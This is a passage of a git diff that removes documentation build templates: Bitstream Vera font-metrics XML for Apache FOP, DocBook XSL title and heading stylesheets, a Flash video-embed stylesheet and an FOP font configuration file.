kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" 
kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="56"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning></font-metrics> \ No newline at end of file
diff --git a/documentation/template/VeraMoBd.xml b/documentation/template/VeraMoBd.xml
deleted file mode 100644
index 9b33107a44..0000000000
--- a/documentation/template/VeraMoBd.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Bold</font-name><full-name>Bitstream Vera Sans Mono Bold</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-19</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" 
ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" 
us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics> \ No newline at end of file
diff --git a/documentation/template/VeraMono.xml b/documentation/template/VeraMono.xml
deleted file mode 100644
index 3a0a86659c..0000000000
--- a/documentation/template/VeraMono.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Roman</font-name><full-name>Bitstream Vera Sans Mono</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-4</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" 
us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf 
gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 
w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics> \ No newline at end of file
diff --git a/documentation/template/component.title.xsl b/documentation/template/component.title.xsl
deleted file mode 100644
index ee21d59ad5..0000000000
--- a/documentation/template/component.title.xsl
+++ /dev/null
@@ -1,39 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="component.title">
- <xsl:param name="node" select="."/>
-
- <xsl:variable name="level">
- <xsl:choose>
- <xsl:when test="ancestor::d:section">
- <xsl:value-of select="count(ancestor::d:section)+1"/>
- </xsl:when>
- <xsl:when test="ancestor::sect5">6</xsl:when>
- <xsl:when test="ancestor::sect4">5</xsl:when>
- <xsl:when test="ancestor::sect3">4</xsl:when>
- <xsl:when test="ancestor::sect2">3</xsl:when>
- <xsl:when test="ancestor::sect1">2</xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:element name="h{$level+1}" namespace="http://www.w3.org/1999/xhtml">
- <xsl:attribute name="class">title</xsl:attribute>
- <xsl:if test="$generate.id.attributes = 0">
- <xsl:call-template name="anchor">
- <xsl:with-param name="node" select="$node"/>
- <xsl:with-param name="conditional" select="0"/>
- </xsl:call-template>
- </xsl:if>
- <xsl:apply-templates select="$node" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$node"/>
- </xsl:call-template>
- </xsl:element>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/division.title.xsl b/documentation/template/division.title.xsl
deleted file mode 100644
index 6c265970d5..0000000000
--- a/documentation/template/division.title.xsl
+++ /dev/null
@@ -1,24 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="division.title">
- <xsl:param name="node" select="."/>
-
- <h1>
- <xsl:attribute name="class">title</xsl:attribute>
- <xsl:call-template name="anchor">
- <xsl:with-param name="node" select="$node"/>
- <xsl:with-param name="conditional" select="0"/>
- </xsl:call-template>
- <xsl:apply-templates select="$node" mode="object.title.markup">
- <xsl:with-param name="allow-anchors" select="1"/>
- </xsl:apply-templates>
- <xsl:call-template name="permalink">
- <xsl:with-param name="node" select="$node"/>
- </xsl:call-template>
- </h1>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/embedded_video.xsl b/documentation/template/embedded_video.xsl
deleted file mode 100644
index dfb33c3441..0000000000
--- a/documentation/template/embedded_video.xsl
+++ /dev/null
@@ -1,22 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook">
-
- <xsl:output method="html" />
-
- <xsl:template match="/d:chapter/d:section/d:mediaobject">
- <xsl:for-each select=".">
- <xsl:variable name="vid_url">
- <xsl:value-of select="./d:videoobject/d:videodata/@fileref" />
- </xsl:variable>
- <div style="text-align: center; margin: auto">
- <object type="application/x-shockwave-flash" width="640" height="420" data="{$vid_url}?color2=FBE9EC&amp;showsearch=0&amp;version=3&amp;modestbranding=1&amp;fs=1">
- <param name="movie" value="{$vid_url}?color2=FBE9EC&amp;showsearch=0&amp;version=3&amp;modestbranding=1&amp;fs=1" />
- <param name="allowFullScreen" value="true" />
- <param name="allowscriptaccess" value="always" />
- </object>
- </div>
- </xsl:for-each>
- </xsl:template>
-</xsl:stylesheet>
diff --git a/documentation/template/fop-config.xml b/documentation/template/fop-config.xml
deleted file mode 100644
index 09cc5ca0f5..0000000000
--- a/documentation/template/fop-config.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<fop version="1.0">
-
- <!-- Strict user configuration -->
- <strict-configuration>true</strict-configuration>
-
- <!-- Strict FO validation -->
- <strict-validation>true</strict-validation>
-
- <!--
- Set the baseDir so common/openedhand.svg references in plans still
- work ok. Note, relative file references to current dir should still work.
- -->
- <base>../template</base>
- <font-base>../template</font-base>
-
- <!-- Source resolution in dpi (dots/pixels per inch) for determining the
- size of pixels in SVG and bitmap images, default: 72dpi -->
- <!-- <source-resolution>72</source-resolution> -->
- <!-- Target resolution in dpi (dots/pixels per inch) for specifying the
- target resolution for generated bitmaps, default: 72dpi -->
- <!-- <target-resolution>72</target-resolution> -->
-
- <!-- default page-height and page-width, in case
- value is specified as auto -->
- <default-page-settings height="11in" width="8.26in"/>
-
- <!-- <use-cache>false</use-cache> -->
-
- <renderers>
- <renderer mime="application/pdf">
- <fonts>
- <font metrics-file="VeraMono.xml"
- kerning="yes"
- embed-url="VeraMono.ttf">
- <font-triplet name="veramono" style="normal" weight="normal"/>
- </font>
-
- <font metrics-file="VeraMoBd.xml"
- kerning="yes"
- embed-url="VeraMoBd.ttf">
- <font-triplet name="veramono" style="normal" weight="bold"/>
- </font>
-
- <font metrics-file="Vera.xml"
- kerning="yes"
- embed-url="Vera.ttf">
- <font-triplet name="verasans" style="normal" weight="normal"/>
- <font-triplet name="verasans" style="normal" weight="bold"/>
- <font-triplet name="verasans" style="italic" weight="normal"/>
- <font-triplet name="verasans" style="italic" weight="bold"/>
- </font>
-
- <auto-detect/>
- </fonts>
- </renderer>
- </renderers>
-</fop>
-
diff --git a/documentation/template/formal.object.heading.xsl b/documentation/template/formal.object.heading.xsl
deleted file mode 100644
index 1a5e697808..0000000000
--- a/documentation/template/formal.object.heading.xsl
+++ /dev/null
@@ -1,21 +0,0 @@
-<xsl:stylesheet version="1.0"
- xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
- xmlns:d="http://docbook.org/ns/docbook"
- xmlns="http://www.w3.org/1999/xhtml"
- exclude-result-prefixes="d">
-
- <xsl:template name="formal.object.heading">
